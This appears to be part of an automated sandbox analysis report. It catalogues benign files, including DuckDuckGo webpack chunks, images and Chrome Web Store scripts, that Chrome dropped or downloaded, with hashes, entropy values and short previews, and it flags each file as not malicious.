                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (356), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):356
                                                                                                                                                            Entropy (8bit):5.38518134584861
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:XzjbdHhjbzrcv8FxkvV+3rWG9ZXY1tMiLmpgFDNInI9QeQdQH5JtTBRXyYDUXTcm:fbjcv8FxAU79StmsaI9QfQ3tTBRXyYYH
                                                                                                                                                            MD5:3905C5DEC47049C0E9C0414B3883FF73
                                                                                                                                                            SHA1:7CCBC28A9386C83DFD749F7B00DE16F3FA98F60A
                                                                                                                                                            SHA-256:054275CD5B32584CA42E62CF5DB129ED955A95B5B88B75FF4BF7D5F46680E921
                                                                                                                                                            SHA-512:97E375B28E05B78E7FBB05B73F741BD472462D2300E53F8EEB06F8686BF3371006884E998593536970D7F84326DD5B735FDF01065A103DD2ECEA8CC9F85E9242
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6513],{53124:function(n,_,u){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[locale]",function(){return u(39040)}])}},function(n){n.O(0,[41966,43965,49224,81125,53343,36926,62242,49706,20581,84969,56987,4770,69706,49774,92888,40179],(function(){return _=53124,n(n.s=_);var _}));var _=n.O();_N_E=_}]);
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2945
                                                                                                                                                            Entropy (8bit):7.85783941152515
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:OuZkeaf1LOhQGUjDevyYwtho4Tp+bzSOYlf94iDmCpQViu86e20rBi7:rkJ1LFGmDevIBpgWOYlf9VaCpQViJ6eW
                                                                                                                                                            MD5:5730A6187495225E119137863E2EF034
                                                                                                                                                            SHA1:451DE7F1B9A7095530690B2F64FB58F6370CE0AA
                                                                                                                                                            SHA-256:EF042B0682C1DEBB22D2BE14670312D765B052577E1EED9478B866C5FEBB6E6A
                                                                                                                                                            SHA-512:6E8BE881B0F5F1B04421A8A2A854483092A9FE2D8EE52168E5AD361DC3F50C860BB7548FF55DB18256AD140068FD9EF56C046145EF6CC47E1F29CA3B55F55391
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/opera-lg.237c4418.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx..]R.I..3...W.w.'V.<..=.....X...... N`q....'0.....X..a^..s..Z.k.3....E..6X......,.H$..D".H$..D".H$.}.:.m...m.X...@..ow..1....._.?.;~._........]..77.A:!...7..F..3~K....;......"....`vs.-....>/..h..8.?.......A.i......1.s.}7.........x...io..c.)|....*.-.....p..d...$d!.).=....h...2a!..(...`...0.S........8o..5.i.......Eo.....w.1...Y....Q..Ih1B0.....P......j.....7.....j..X.Y.{..G.....b.............N..s........?<T.-.1~z{...*.2...Y..{q.>.:.f....j.a`~.+.......1W....}....w._.....5.&.z..f....1._T...t.......+HX..r.4.?...^.@...&...;..x...Tt.D...,....G.(*.3..M...@...?..2(U...d..C. &...-..V.d...o...4.&.....S....!".S.Y\......u.......g/t.......@~..~.........FZ.$..%".....|....}W.<mn..-.E..8$....O....w;..9:@c..d8.'./.!.,.~..y..j.~...[...:.....o.:....."...$`..f>x....(f..v.o.7./.q........q..O..so.m~?.2...U.H....c.y~-6.*...1..J....=...0....X. B..d.W.So@..z..l.A.4..... ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 500x434, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5836
                                                                                                                                                            Entropy (8bit):7.297515748907693
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:6SE0GxqLVMf7UEKhbpvxqBTfhmM7L9OIjFIkTPYL4qaa92K+Tz+FS:6Sf/LOf7kwmTCFZTPEaa92K+31
                                                                                                                                                            MD5:D4C3993EF0D9ED04682761285CBF27B3
                                                                                                                                                            SHA1:00E573D9537ECA4CE317979208903FDD783A32B6
                                                                                                                                                            SHA-256:E2C2CBC53E41377DADDA30B14FEE63A9168879628AAC3525AFF20BA82139FCCA
                                                                                                                                                            SHA-512:4CA59CA8ACC78638281CBB30ECE25C108B73D458D84ED3AB73274A2042E19F906DC22ACBF6921A2F1AC803FFC9EA178817E4233A594B470AB33116EB91EEE2A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........................................................................................[...,..(...R....,. .".dIdE.6K.,........Evg..@,.."(.P.BPT.......\..,.K.Q.dED..(...(.vz..@* T....P..%...). .3,.Fe..d."...(@...Pu.8...AP QB......@*.....K%..r.9.dID......T'_.... E. P(DZ)(AJP...!%D\...6K%.%..A`.... .A....J.Aa@*...R. ..HIQ%.Is:.%.$.Q ..!P........J......AA@JT....$.K.s,.1%..Id..*@. . ..W....A(.(....(*P..($.Ia%..\.9.$.Y.P .(.R......@.`E@.@.T...(B...X"K".e..s.K%..BQ.@..@.R(.>.0DTR.@.X..... ....%..2.s,.%..d. .....E.+...*.P .. .*....(*......d..D..d.@@.P..."....1B.. ,...T..**...K.IdIr.Y..9.Q%.........tz8.(@*.. U%..XYA@D.%BXfY.e..'6J$........._.G..%..(.......@......2.s,.,.D.......XXQ..=.... ....(.AJ..@.!,$.\...d.....J.....[..c.(..P..(...Z...JI@...dfY,.,...R@.%...J.{..$....-B.T.......P..1%.g(.....TR-....A^....Z@Q...P......%..,.,.$
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 598 x 1114, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):92229
                                                                                                                                                            Entropy (8bit):7.986327668700224
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:AXfv3ose6Cd3X6pQnXJaoCXtvPAynhE6I5FPWEvQ/Ctf4mbGEttXxeMuRnztVBA:aPSZdqQXgXvPAshEz5YXmbGEvXxZuxj6
                                                                                                                                                            MD5:6DFB140084554026C9F09A77F12F2860
                                                                                                                                                            SHA1:3014B06321E100BFEFCDF9BABF6D95D594F0B88B
                                                                                                                                                            SHA-256:7734FD711FA3B761C905C5A950E0D5F215EB6C9EF53DA62C2EB3BA4B8F17F9D4
                                                                                                                                                            SHA-512:BFC981CDB5229AE69370B262BA3DB91A70C712CEA5C93C5382389FC5C6C8C9D11D60F859C8760ADBE2FBE5E353426226186FC6A3718345FDF70CE388CED582EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...V...Z......i.l....PLTE..............................................................................W3....................m$#$.........................................................544|||...................................@@@-,,..........ttu9'..^<RF@......<1(,".G<6......nnmIII...I7*ggf,.......V6"I..__^........fD0\NG...hG.............SC0...XXW.....QPO...e!.W...........gXQq.Wsd\..9}pe.mcY5..x.}n.v\..g.+Oi...............v.x...EG......~...s[E..o..U.b0.j...I..iH.{_...b.gS..uN7...f;!......v:.vE"..+.rS......q+.r?.[>.N(..#.zP..^/.....O....w......7J.x..F......[D...S"?U.5~o?.^..U...............c....w{....{[+onH.p..l.T..~...YyY....2...9i.@..&H`..?..>ac......e.G..M...s..f.f.X.rS......P0...w....."....?*.0$.5..zW`y...y....&A^P...X.........tRNS....!........{Hjd.Z......d.IDATx..............................=8........m.UUUU.+...a........7.w'.j.5.......bEO...;.4.`.B?.N......1.\..;...))....d....*cm8.........T.Q........c..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (27593), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):27593
                                                                                                                                                            Entropy (8bit):5.223911365632464
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:8ozu5x1m9NDf/i8XdOory0fCtOTZNoOc4VJ6C1JGHPrOReNhmBW:3u/eViww+ywToWVJ6CXpW
                                                                                                                                                            MD5:D5E75250B712FFCEE9696E9165BDA48B
                                                                                                                                                            SHA1:B0E2EAA888E672D17A8BE01BA19CCCA0BE4BF8E0
                                                                                                                                                            SHA-256:91F423471D13239124F4BCE98FAE216276C368FAE466DB3040E061999EEF2113
                                                                                                                                                            SHA-512:C091EB620C1FB302006C8265CE4C6800FCFF768EDD243BCE0EFC064F6DEB499E8D1D411D3131E9A9A4A6CD837BDC0AD2FB1829A3094F81B3A0EFC100C1B21584
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[81125],{61760:function(n,e,t){"use strict";t.d(e,{cZ:function(){return Re},t9:function(){return Me}});var r=t(67294),o=t(14921),u=t(55152),a=t(69695),i=t(40884),c=t(61331),d=t(24683),l=t(63366),s=t(87462),f="data-focus-lock",v="data-focus-lock-disabled";function p(n,e){return function(n,e){var t=(0,r.useState)((function(){return{value:n,callback:e,facade:{get current(){return t.value},set current(n){var e=t.value;e!==n&&(t.value=n,t.callback(n,e))}}}}))[0];return t.callback=e,t.facade}(e||null,(function(e){return n.forEach((function(n){return function(n,e){return"function"===typeof n?n(e):n&&(n.current=e),n}(n,e)}))}))}var m={width:"1px",height:"0px",padding:0,overflow:"hidden",position:"fixed",top:"1px",left:"1px"},h=function(n){var e=n.children;return r.createElement(r.Fragment,null,r.createElement("div",{key:"guard-first","data-focus-guard":!0,"data-focus-auto-guard":!0,style:m}),e,e&&r.createElement("div",{key:"guard-last","d
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (31614), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):31614
                                                                                                                                                            Entropy (8bit):5.48177450486598
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PxfPUgGhRciMID4Fq+bTHJjUrtYgFiFz3EZWOmYw3Q78X1UqsZniipvPa495WKJs:5fPl8ciERUrtYgFiL3Q741UqucQs
                                                                                                                                                            MD5:6F6243148C8BA8CBA1BF4063285B0BC2
                                                                                                                                                            SHA1:61BACE511DD56413A02CEB388F499AB2ACE263A1
                                                                                                                                                            SHA-256:574A9644DF5A5B88BF448DB5D6EC7A4E8AAE7EBFDC18462A1511ED2C5DCBBCC1
                                                                                                                                                            SHA-512:1D204AA18A9D0D3993723D67E33FE0FC52851AD8CE0CA1EDE2265BC387CFC95A4A3CCFE9336CBBC661F555D7637768300734E45FF8FCADF5BA345F47D68F2701
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49706],{80912:function(e,n,r){"use strict";var o=r(59499),t=r(4730),i=r(67294),s=r(74956),a=r.n(s),c=r(94184),l=r.n(c),d=r(43165),u=r(24446),h=r(85893),_=["as","className","variant","appearance","elevation","size","once","onClick","children"];function p(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);n&&(o=o.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,o)}return r}function g(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?p(Object(r),!0).forEach((function(n){(0,o.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):p(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var f=(0,d.j)((function(e,n){var r=e.as,s=e.className,c=e.variant,d=e.appearance,p=e.elevation,f=e.size,v=void 0===f?"m
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):13056
                                                                                                                                                            Entropy (8bit):7.9825753785894475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:WfM15VwkXsc0FbwCxzQWorYzNGIxW+TEGqq:H9wXhvxzFokzUIfQw
                                                                                                                                                            MD5:73727546A9F348A13031D2BC949E23BB
                                                                                                                                                            SHA1:CC63703BA1EF05070C32229137E70FAB7D8918A6
                                                                                                                                                            SHA-256:F16AD8E6CFAD2B8926DE41097901917D24471AD55AC2217B443D7BA19AF6D174
                                                                                                                                                            SHA-512:BB63BC4203E61128703844AA5DFF1D1192D980C097D8119D994D51AF96CF4E6D17B1BAF4415FC562FF8CDF3461BEA5C16A9F250A8D972041D13C668A5CAFB987
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/app-store.501fe17a.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...2.IDATx..}[.fWu.Z........1.0...1.$.I..H<.BH.R.JJ..RH~..Ty.......*.*..D.*.x.\.c...G...H......JB..#.I3..Y.g......{.?.iQ..-......{.u...&.k{m......^.k{m................S.......Y.o.4...x4.....C..>..,...qi>o.0..q.~f.].e.3>3I......h.t...y.3.{.X..H..Q.Q.{....:{d....z............1o)D.A..Bgo....I>.*...1i...w...X...x.r.Dc:..4...a..!..X.ii.<.....v..4a..<..........c.7...r.U...."......;..y.iGM.IV.....&.A....(..V....]!f.~\QaD@..0....jn..r+WTQ.`.>0FC.<.t.....6..m.v.Pa....G..(B./.eU.$b........22.H`.\.#.iD0V...;E!...........f.sX.^2Q.cu#<.$1Or.b...4.4IY.....==^:..S..|.v.]...V/4...P?4I.d.....Uk4.....[1..?gN.y%.......4%b.|;.4'.+..Y..9...-.M...l$.....>..g....=W..W........eRkY....&?.K?m..P.d...z./1.."9X.g2...c..6QH@'..4...N%mA..y...ml...r..Ue9.<..j..y+..._.u>.>Ut...P.')Pr.L).ZD.0z.=Za.._W.....c.nP@7.BeeYP<c.#.^.....#......H@..o-X1.....8(>...]....y).`.....u. ..:'..S.....o.X0....*.,E.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (8096), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):8096
                                                                                                                                                            Entropy (8bit):5.17298909251343
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:xdZJhLyZ3CBgQRsGrCp80Qwp4eFNsKrVTAVgRQFpECN7syKZX3dZ5ZC0J80R03wg:5LmG//Cp8CNsKrlAVIgiSwg
                                                                                                                                                            MD5:68FDD7FC1B54B961EE20277A3B9F0A3E
                                                                                                                                                            SHA1:A7A1715F268B723095A60991132319F86DA1F15A
                                                                                                                                                            SHA-256:B3F71D5E891141D9A8D2075BAD2850163CEDE4CDE7B0479355A12657750A7307
                                                                                                                                                            SHA-512:D406C8AA9E64F506AEE92F54D0668C9A9EFF5899C48CCB6DBD9F4E983675BD7D8C2EDE3788E653DCBD08B25BE48D3330F1676B8F93CFE34B8FE94ED59CAF213C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/chunks/67191-8ba2ab1c9d234a2e.js
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[67191],{73579:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){var r=o.default,a=(null==t?void 0:t.suspense)?{}:{loading:function(e){e.error,e.isLoading;return e.pastDelay,null}};e instanceof Promise?a.loader=function(){return e}:"function"===typeof e?a.loader=e:"object"===typeof e&&(a=n({},a,e));if((a=n({},a,t)).suspense)throw new Error("Invalid suspense option usage in next/dynamic. Read more: https://nextjs.org/docs/messages/invalid-dynamic-suspense");a.suspense&&(delete a.ssr,delete a.loading);a.loadableGenerated&&delete(a=n({},a,a.loadableGenerated)).loadableGenerated;if("boolean"===typeof a.ssr&&!a.suspense){if(!a.ssr)return delete a.ssr,u(r,a);delete a.ssr}return r(a)},t.noSSR=u;var n=r(31032).Z,a=r(12845).Z,o=(a(r(67294)),a(r(23668)));function u(e,t){return delete t.webpack,delete t.modules,e(t)}("function"===typeof t.default||"object"===typeof t.default&&null!==t.defau
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (8096), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8096
                                                                                                                                                            Entropy (8bit):5.17298909251343
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:xdZJhLyZ3CBgQRsGrCp80Qwp4eFNsKrVTAVgRQFpECN7syKZX3dZ5ZC0J80R03wg:5LmG//Cp8CNsKrlAVIgiSwg
                                                                                                                                                            MD5:68FDD7FC1B54B961EE20277A3B9F0A3E
                                                                                                                                                            SHA1:A7A1715F268B723095A60991132319F86DA1F15A
                                                                                                                                                            SHA-256:B3F71D5E891141D9A8D2075BAD2850163CEDE4CDE7B0479355A12657750A7307
                                                                                                                                                            SHA-512:D406C8AA9E64F506AEE92F54D0668C9A9EFF5899C48CCB6DBD9F4E983675BD7D8C2EDE3788E653DCBD08B25BE48D3330F1676B8F93CFE34B8FE94ED59CAF213C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[67191],{73579:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){var r=o.default,a=(null==t?void 0:t.suspense)?{}:{loading:function(e){e.error,e.isLoading;return e.pastDelay,null}};e instanceof Promise?a.loader=function(){return e}:"function"===typeof e?a.loader=e:"object"===typeof e&&(a=n({},a,e));if((a=n({},a,t)).suspense)throw new Error("Invalid suspense option usage in next/dynamic. Read more: https://nextjs.org/docs/messages/invalid-dynamic-suspense");a.suspense&&(delete a.ssr,delete a.loading);a.loadableGenerated&&delete(a=n({},a,a.loadableGenerated)).loadableGenerated;if("boolean"===typeof a.ssr&&!a.suspense){if(!a.ssr)return delete a.ssr,u(r,a);delete a.ssr}return r(a)},t.noSSR=u;var n=r(31032).Z,a=r(12845).Z,o=(a(r(67294)),a(r(23668)));function u(e,t){return delete t.webpack,delete t.modules,e(t)}("function"===typeof t.default||"object"===typeof t.default&&null!==t.defau
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (26035)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):880298
                                                                                                                                                            Entropy (8bit):5.788094456851139
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:Mukgof3AZDVfXJp7VV+/EWL/6wvnANGtmTj/jWqPD50DM7MlAoCVEYiOQxUvuGqD:YoZDVfXJrV+L/jfAH7Wel0jCjrvgD
                                                                                                                                                            MD5:8D5D8625775FD8F0DBD6C6D7878DE525
                                                                                                                                                            SHA1:5A7AAD2B6EDC24C10B9307DAA4FC5F65C1C5B0BE
                                                                                                                                                            SHA-256:950CC4AACFEA7F23AE00A4630D90FCE34F17016E3163BD0411BAEF1CC6B00BD2
                                                                                                                                                            SHA-512:BF2E6CB74B863E6AE20F38760D3E2C343F92C56F25175774CBA82F541D60367D65B6CAF0B939BCF30B2267A3104F5CAA98914AFB2FE9546E57A27C65E9504AE5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=_b,_tp/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=ws9Tlc,n73qwf,UUJqVe,IZT63,e5qFLc,O1Gjze,byfTOb,lsjVmc,xUdipf,OTA3Ae,A1yn5d,fKUV3e,aurFic,Ug7Xab,gIl2M,mI3LFb,ZwDk9d,V3dDOb,YYmHzb,p8L0ob,MT4Hub,h4ilFc,M0x0ie,zKiH5d,o2G9me,mUxuKd,ri2s0b,kBpGk,qv5bsb,UkbOSe,DNlSjf,Xi0ENb,Fu7Bjd,O6y8ed,MpJwZc,PrPYRd,LEikZe,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,s39S4,duFQFc,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,CfLNpd,SdcwHb,aW3pY,pw70Gc,EFQ78c,ZfAoz,Ulmmrd,mdR7q,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,ebZ3mb,Z5uLle,BBI74,sI9bWe,ZDZcre,FdMhB,MdUzUe,YA1iG,V9amgb,A7fCU,zbML3c,zr1jrb,QvLWAb,Uas9Hd,pjICDe"
                                                                                                                                                            Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x297, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):12330
                                                                                                                                                            Entropy (8bit):7.5155551942923235
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PW+mkZcqmyARZkql7STR7hWK9gPZLDCmNuf:PfJZcqWZkql7cRMK94ZLDCmNo
                                                                                                                                                            MD5:964C26057DA534FE411CB4AA61DAEAE9
                                                                                                                                                            SHA1:2316937CD047A36038CF30149F47764EC01D4BCD
                                                                                                                                                            SHA-256:04ECC654F7BD934EF2DF87EA5BD21175B86BA0C2D9CB75FABDADCC87BC3A59B7
                                                                                                                                                            SHA-512:813299CCFEC179A099AD6244241568B97F242E2B03A7D88547586E68DE11A448F727BDAE55EF6BB9623C587012F50DF4EC42C89B01E9CF9F2E7A14EEABDC6BB3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/download-bg-dark-sm.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................).d...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..5.#...;.|z}:c..D........\...]..1.....R....y.V+...........x..........K.....9.}...'=~..........|...o..../..:..{...... .K.../.N.....3.. .v?.>.~T.......N:..]z..%`.=q.^..1. dd...=).\.....wq<.20.lt..A.zs.E.....O.....[...n1....OA..<............./.L9.......y........^y......=x.O..\.2x..;.5Ko.....................U...r.X<....:.j.N..sU.'...E.Q.|s.9....ONy......gR....[
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2134
                                                                                                                                                            Entropy (8bit):7.738686412916403
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:mXIZ4hnR/5Q+dgTpwuAvDCVpxkCO+cVXSGBJ:2kuLJdgTp7lkH+cMGBJ
                                                                                                                                                            MD5:A1186AD62CD74B50F71413011C393483
                                                                                                                                                            SHA1:AA9454F7ACB8996B77C1BA54D5C85D598522075B
                                                                                                                                                            SHA-256:68AC001E6B000703025DC8CF60C924F7D69213452D8A1C21D91BF62AE7E16A48
                                                                                                                                                            SHA-512:81AC621E60511C1BBC4A40257BD19382E2DBBACA85C3B3D32568ED9DF4989FA1A70594B92CBAB9384475D1A5411EB75E23876799A6DEF9647A967F5B7A3E47A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...o[E..g..(...j.qs..q...Bq8.vAm.....?.....b..hsGJ*q$..p...Qq)6pB..A..P!#.Fi...8..T...og.~.U...........x<.....x<.....h.P=...B..... >]..g;......}v.Bm.<..M.S......^..i..[.1]...(..8Y}=7........V....J..O}^<..G|..F......O....V...y..&..(.-fRA....(B}........R."x.....Z*.0.....>...N/.W@.....-.$../}R<.0..a..X>..U/B4"..F.>w.b......l?.....d.-..~?.1.... .A....S.g...g F.......K....G.sd....H....kh...e. vH.Y<.t.?...R..K$@v.....}[8... .I......V..`....X%A...o..G...}.<..q..... .J..p{.....K%.n[.%..~..$.#. .J ...$.."_....<...;...=..XL+..SI.d2V.$#w...W....%il4..B@.H.Z9.......V.M....Hg.pj.Xu.-.*.BH.<1.w.|....%.vqg.l...=...._..Q..X#.BP.$..e.m.*....@.Z..a...].v...F+.@(K ..^]X..66.gs`1...P......n.g...o.._.].U...@.I ..q..",..[.C....P.`..{./..{.../Gg..H.....!...K1X..-....U.....m.+..G.......m...~/..2...j...@l. j.=t....LW... qK.0.^r..F.. qI.).=.....@3..@LK.;...x>.=6...1%...{..e.m........~/....g.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 48x48, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2752
                                                                                                                                                            Entropy (8bit):7.758506091253929
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:D/Yvb7WnOancLupA6Bmch1V7tbs32QzbrDg2ohYYNtaKA//WWT6LYGh9MYMpn:D/Yz7WnOscYmc3V7tbC2m/4bN9bWShG5
                                                                                                                                                            MD5:307E33C38B611E17834FC3401601EA15
                                                                                                                                                            SHA1:238BA238C7FE372E7FB87CA959CBD3854427D69A
                                                                                                                                                            SHA-256:8F52EDC90297A99F81133E51E95D9DBB7C44D2F9BCD03D7C18A3F9C208BC82FD
                                                                                                                                                            SHA-512:5547DA6C417B8069EA024D221262F19CD2FE98378FF9F500E40745077F24803C9C06F68ECB2362F78942AC13F0D6ABABAB42355C7C2178DA81DDCEE2CAFC1481
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/a-/ALV-UjUBDI4MyIvJIB5vN1VD0pk5tN_Np7FJQoQn_-355hQsgjo6D5U=s48-w48-h48
